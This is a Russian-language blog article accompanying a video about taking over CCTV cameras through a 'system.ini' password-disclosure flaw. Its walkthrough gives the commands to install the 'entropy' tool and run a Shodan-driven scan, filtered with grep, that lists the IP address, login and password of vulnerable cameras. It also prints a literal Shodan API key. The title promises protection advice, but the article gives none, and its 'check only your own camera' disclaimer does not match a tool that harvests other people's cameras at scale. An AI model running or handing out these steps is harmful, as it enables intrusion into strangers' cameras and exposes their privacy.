| Взлом камер без брутфорса | Как защититься от взлома? | UnderMind
● В этом ролике: я расскажу вам о том, как злоумышленники взламывают камеры используя массовую и критическую уязвимость камер видеонаблюдения. Эта уязвимость позволяет подключиться к вашей камере в обход пароля.
Я всегда учу Вас выбирать хорошие пароли, поскольку злоумышленники пользуются брутфорсом и подбирают лёгкие пароли за считанные минуты. Но сегодняшняя уязвимость, которую я обнаружил на своей камере, позволяет злоумышленникам с лёгкостью получить пароль от вашей камеры (причем пароль любой сложности) буквально за пару минут. И это не используя брутфорс. После просмотра этого ролика, вы узнаете как проверить свою камеру и как защитить себя от подобной уязвимости.
Статья в дополнение к моему ролику о взломе камер видеонаблюдения.
Слышали что злоумышленники могут взламывать ваши камеры, не используя брутфорс? Это возможно благодаря критической уязвимости, которая есть почти во всех китайских камерах видеонаблюдения.
Чтобы проверить СВОЮ камеру на устойчивость к эксплоиту system.ini, я воспользовался Kali Linux (хотя можно и не только им).
Для начала клонируем репозиторий entropy
git clone https://github.com/entynetproject/entropy.git
Переходим в каталог с утилитой
cd entropy
Назначаем права на запуск установщика
chmod +x install.sh
И устанавливаем саму утилиту
./install.sh
Но у меня без установки зависимостей утилита не захотела работать, поэтому мне пришлось вводить такую команду. В вашем случае, возможно, придется вводить pip или pip2 - если будут ошибки. Это зависит от версии python, которую вы будете использовать
pip3 install -r requirements.txt
Теперь регистрируемся в shodan, и получаем API ключ.
После этого, запускаем саму утилиту, указав свой API ключ Shodan
python3 entropy.py -b 2 -v --shodan "o7X2SlIJiidq3XgA9iM8t34HYj69pB7T"
А для фильтрации вывода (чтобы у нас отображался список только уязвимых камер), мы воспользуемся утилитой grep
python3 entropy.py -b 2 -v --shodan "o7X2SlIJiidq3XgA9iM8t34HYj69pB7T" | grep [+]
В результате вы увидите IP, логин и пароль уязвимой камеры, которую Вам надо будет защитить. Мы ведь не занимаемся взломами в противозаконных целях.
Пожалуйста, проверяйте только свои камеры на защищенность и только в ознакомительных целях.
Don't be evil, be root.
Оценили 3 человека
6 кармы